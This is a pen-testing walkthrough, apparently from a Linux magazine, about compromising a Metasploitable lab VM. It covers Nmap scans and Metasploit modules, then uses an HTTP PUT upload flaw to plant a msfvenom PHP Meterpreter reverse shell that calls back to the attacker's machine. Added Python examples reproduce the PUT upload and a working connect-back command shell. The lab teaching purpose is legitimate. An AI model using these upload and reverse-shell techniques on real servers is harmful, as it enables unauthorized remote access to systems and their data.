Hack the system
Strike down upon thy hacking sandbox with great vengeance. Wait, what did it ever do to you?
If you followed our handy guide on the previous pages, then you’ll already have augmented your Kali Light installation with Nmap, a port-scanning utility par excellence and a vital part of any pen-tester’s arsenal. As mentioned on the DVD page (there will be the standard complement of two next month) it’s possible to ‘upgrade’ this to the full-fat Kali with apt install kali-linux-all, but there’s no way we could provide even the pithiest summary of the 14GB of tooling that command would bestow upon you. If you just want the most popular tools, then apt install kali-linux-top10 will only cost your VM about 600MB. We’re going to play it frugal and only install what we talk about, because that’s how we roll.
For our first trick, we’ll install Rapid7’s Metasploit framework. This is an all-powerful environment that allows you to search, customise and deploy exploits for known vulnerabilities. It’s the recommended platform for attacking the Metasploitable VM and is completely free (a commercial version with a fancy web interface and countless other features is available). Grab it with:
$ sudo apt install metasploit-framework
That command downloaded 750MB of packages on our VM. Before we use it, let’s return briefly to Nmap. Just running Nmap with an IP address (as we did in Step 5 of the walkthrough) scans only the 1,000 most popular TCP ports (where you’d usually find web, Telnet, SSH and Windows file-sharing services). It’s possible to run any service on any port, so if we want to be thorough we should scan the whole range, which we can do with
$ nmap -p0-65535 10.0.2.4
changing the IP address to whatever the Metasploitable VM gets assigned in your setup. You should find another couple of services running, on ports 3500 and 6697.
A little research will tell you that port 6697 is used by the UnrealIRCd server. You can confirm this by installing an IRC client such as HexChat on the Kali VM and connecting to the Metasploitable VM (see image below).
And a little more research (i.e. a DuckDuckGo search) will tell you that this is indeed a vulnerable version. Let’s forget that for a second and fire up Metasploit by running msfconsole. We can search for available exploits by typing search unreal. Apart from a buffer overflow in the classic Unreal Tournament 2004, you’ll find a backdoor in our vulnerable daemon. Let’s find out about it and then load it with:
> info exploit/unix/irc/unreal_ircd_3281_backdoor
> use exploit/unix/irc/unreal_ircd_3281_backdoor
Tab completion works, so you only need to type as far as ...irc/. You’ll need to attach a payload for this to be any use, and we’ll cover doing just that on the next page.
You’ll find credentials for the rest of the running services on the Metasploitable wiki page at https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities. But that’s slightly cheating: hackers do often find passwords lying around, but sometimes they have to do some work too. So let’s get to work. We know there’s a web server running on the vulnerable machine, and if you visit it you’ll see a directory listing (indicating right away that Apache has been poorly configured) from which you can find a couple of potentially vulnerable applications. But what if there was something else going on? Metasploit’s dir_scanner module will search for commonly named directories on a server (which may not show up in directory listings), so let’s see what it has to say. Activate, set up and run the module like so:
> use auxiliary/scanner/http/dir_scanner
> set RHOSTS 10.0.2.4
> run
Apart from the directories we knew about, there are also /cgi-bin, /icons and /uploads. The HTTP code 403 shown after the first two indicates they are forbidden, so we can’t do much with them at present. But the /uploads directory is fair game: you can browse to it and find an empty listing. If we are lucky, perhaps we can upload something to it? Let’s investigate further using Nmap. It ships with a handy script for seeing which HTTP methods are allowed for which directories. Open another terminal and run:
$ nmap --script http-methods --script-args http-methods.url-path='/uploads',http-methods.test-all -p 80 10.0.2.4
Note that the script-args value can’t contain (unquoted) spaces, so there’s no space between '/uploads', and the next argument. You should see the following encouraging line:
Potentially risky methods: DELETE PUT CONNECT
So we can use an HTTP PUT request to deposit more or less any file we like there. We have discovered a file upload vulnerability, go us! Create a PHP script (on the Kali VM) with:
$ nano info.php
Fill it with the following:
<?php phpinfo(); ?>
and save (Ctrl-x, Y, Enter) to make a simple PHP script that prints a bunch of information about the server’s PHP config. Let’s see if we can upload this, using another handy Nmap script:
$ nmap --script http-put --script-args http-put.url='/uploads/info.php',http-put.file='info.php' -p 80 10.0.2.4
If you see:
| http-put: /uploads/info.php was successfully created
then you can begin to get excited. This excitement may continue when you visit (still from the Kali VM) the URL of our recently implanted file: http://10.0.2.4/uploads/info.php. Not only can we upload things so that they are accessible from the outside world, but we can have the web server execute arbitrary PHP scripts. The phpinfo() function reveals lots of juicy info about the server, which could inspire further attacks. But since we know we can run PHP we don’t need much more:
Metasploit can craft us a PHP reverse shell, granting us remote access with the same privilege level as Apache.
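To make the probe-then-upload exchange above concrete, here is an added example (not code from the article, from Nmap or from Metasploit) that performs with http.client what the http-methods and http-put scripts do: send OPTIONS and read the Allow header, then PUT a file and fetch it back. A constructed stand-in server plays the misconfigured Apache (PUT accepted under /uploads, refused elsewhere), so the whole thing runs on 127.0.0.1 without a Metasploitable VM. The class and function names, the /uploads layout and the "risky" method list are assumptions made for the demo.

```python
"""Added example: OPTIONS probe followed by an HTTP PUT upload, both sides visible.
The SloppyUploadHandler is a constructed fixture standing in for the misconfigured
Apache on the target; it is not the real server."""
import http.client
import os
import tempfile
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

UPLOAD_PREFIX = "/uploads"                      # writable directory on the target (assumed)
RISKY = {"PUT", "DELETE", "CONNECT", "TRACE"}   # what http-methods flags as "potentially risky"


class SloppyUploadHandler(BaseHTTPRequestHandler):
    """Constructed fixture: a DAV-style directory that accepts PUT under /uploads."""
    root = tempfile.mkdtemp()                   # stands in for /var/www/uploads

    def _local(self, url_path):
        # basename() drops directory components, so ../ cannot escape the upload dir here
        return os.path.join(self.root, os.path.basename(url_path))

    def _reply(self, status, body=b""):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        allow = "GET, HEAD, OPTIONS"
        if self.path.startswith(UPLOAD_PREFIX):
            allow += ", PUT, DELETE"            # the misconfiguration the scan reveals
        self.send_response(200)
        self.send_header("Allow", allow)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if not self.path.startswith(UPLOAD_PREFIX):
            self._reply(403, b"Forbidden\n")
            return
        with open(self._local(self.path), "wb") as fh:
            fh.write(body)
        self._reply(201, b"Created\n")

    def do_GET(self):
        target = self._local(self.path)
        if self.path.startswith(UPLOAD_PREFIX) and os.path.isfile(target):
            with open(target, "rb") as fh:
                self._reply(200, fh.read())
        else:
            self._reply(404, b"Not Found\n")

    def log_message(self, *args):               # keep the demo quiet
        pass


def _request(host, port, method, path, body=None):
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=body)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, resp.headers, data


def allowed_methods(host, port, path):
    """What http-methods does: OPTIONS request, parse the Allow header into a set."""
    _, headers, _ = _request(host, port, "OPTIONS", path)
    return {m.strip().upper() for m in headers.get("Allow", "").split(",") if m.strip()}


def risky_methods(methods):
    return sorted(methods & RISKY)


def put_file(host, port, url_path, data):
    """What http-put does: PUT the bytes at url_path and report the status code."""
    status, _, _ = _request(host, port, "PUT", url_path, body=data)
    return status


def run_demo():
    server = HTTPServer(("127.0.0.1", 0), SloppyUploadHandler)   # port 0: OS picks a free one
    host, port = server.server_address
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        payload = b"<?php phpinfo(); ?>\n"      # the same info.php as in the walkthrough
        result = {
            "root_risky": risky_methods(allowed_methods(host, port, "/")),
            "uploads_risky": risky_methods(allowed_methods(host, port, "/uploads")),
            "put_status": put_file(host, port, "/uploads/info.php", payload),
            "put_elsewhere": put_file(host, port, "/cgi-bin/info.php", payload),
        }
        status, _, body = _request(host, port, "GET", "/uploads/info.php")
        result["get_status"] = status
        result["roundtrip_ok"] = body == payload
        return result
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

The 201 on the PUT is the protocol-level equivalent of Nmap's "was successfully created" line; the 403 from /cgi-bin shows why probing each directory separately matters, since the risky methods are enabled per location, not server-wide.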
A reverse shell allows us to execute commands directly on the server (like a regular shell), but unlike a regular shell it doesn’t listen for incoming connections: it reaches out to you. Metasploit has its own reverse shell called Meterpreter, which can be configured and implanted in all kinds of things. We can make a PHP payload using the msfvenom utility. The lhost argument below refers to the Kali VM this time, rather than the Metasploitable one (which should be 10.0.2.4). You can find this out by running ip a.
$ msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.2.15 lport=4444 -f raw > meterpreter.php
This tiny (1K) payload opens a socket back to our Kali VM, and we’ll configure Metasploit to listen for this in a moment. First we need to plant our file:
$ nmap --script http-put --script-args http-put.url='/uploads/meterpreter.php',http-put.file='meterpreter.php' -p 80 10.0.2.4
Now we configure Metasploit to listen for any incoming connections:
> use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> set lhost 10.0.2.15
> run
Now return to the /uploads directory listing on the vulnerable VM. You should see that meterpreter.php has been successfully uploaded. Click it. Nothing will happen in the web browser, but in Metasploit you should see that a Meterpreter session has been opened. We are properly in business now. Lots of the Bash commands you’re familiar with will work here, so you can poke around directories and such. You can also upload and download files, and invoke further Meterpreter mayhem. Type help for a complete list of commands. If we run:
> getuid
we can see we are indeed running as the www-data user, which pretty much gives us free rein over the /var/www directory on the vulnerable host and lets us peruse all but the most sensitive bits of the filesystem (e.g. the /etc/shadow file, where password hashes are stored). It would be nice if we could find some kind of privilege escalation that would enable us to get root. But sadly we’re all out of space.
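To show what the handler and the planted payload are actually doing between "run" and "getuid", here is an added example (not from the article, and not Meterpreter, which speaks a much richer staged protocol): a minimal connect-back shell. Handler is the listener that exploit/multi/handler sets up; implant is the payload that dials out and runs whatever it is sent. The output framing marker, the class names and the use of a local thread in place of the Apache worker are assumptions for the demo; the whole exchange stays on 127.0.0.1.

```python
"""Added example: the connect-back ("reverse") shell pattern behind exploit/multi/handler.
Handler = listener (lhost/lport); implant = payload that reaches OUT to it.  Localhost only."""
import socket
import subprocess
import threading

END = b"\n<<END-OF-OUTPUT>>\n"   # constructed framing: marks the end of one command's output


def implant(lhost, lport):
    """Payload side: connect OUT to lhost:lport, run each received line as a shell
    command and send the output back.  Note that nothing listens on this host."""
    with socket.create_connection((lhost, lport), timeout=10) as s:
        s.settimeout(None)                      # makefile() wants a blocking socket
        for line in s.makefile("rb"):
            cmd = line.decode(errors="replace").strip()
            if cmd in ("", "exit"):
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=30)
            s.sendall(proc.stdout + proc.stderr + END)


class Handler:
    """Listener side: what `use exploit/multi/handler`, `set lhost` and `run` give you."""

    def __init__(self, lhost="127.0.0.1", lport=0):   # lport=0: OS picks a free port
        self.sock = socket.socket()
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((lhost, lport))
        self.sock.listen(1)
        self.lhost, self.lport = self.sock.getsockname()
        self.conn = None

    def wait_for_session(self, timeout=10):
        self.sock.settimeout(timeout)
        self.conn, peer = self.sock.accept()    # blocks until the implant dials in
        self.conn.settimeout(timeout)
        return peer

    def execute(self, cmd):
        """Send one command line, collect output up to the END marker."""
        self.conn.sendall(cmd.encode() + b"\n")
        buf = b""
        while not buf.endswith(END):
            chunk = self.conn.recv(4096)
            if not chunk:                       # implant went away
                break
            buf += chunk
        if buf.endswith(END):
            buf = buf[:-len(END)]
        return buf.decode(errors="replace")

    def close(self):
        if self.conn is not None:
            try:
                self.conn.sendall(b"exit\n")
            except OSError:
                pass
            self.conn.close()
        self.sock.close()


def run_demo():
    handler = Handler()
    # In the walkthrough this role is played by the Apache worker that executes
    # meterpreter.php; here the implant simply runs in a local thread.
    t = threading.Thread(target=implant, args=(handler.lhost, handler.lport), daemon=True)
    t.start()
    peer = handler.wait_for_session()
    try:
        echoed = handler.execute("echo reverse shell says hi").strip()
        user = handler.execute("id -un 2>/dev/null || whoami").strip()  # the getuid equivalent
    finally:
        handler.close()
    t.join(5)
    return {"peer_is_local": peer[0] == "127.0.0.1", "echo": echoed, "user": user}


if __name__ == "__main__":
    print(run_demo())
```

The direction of the TCP connection is the whole point: the target's firewall usually allows outbound traffic even when it blocks inbound, so the implant initiating the connection is what makes this work from behind NAT, and it is also why the lhost in the payload must be the attacker's reachable address rather than the target's.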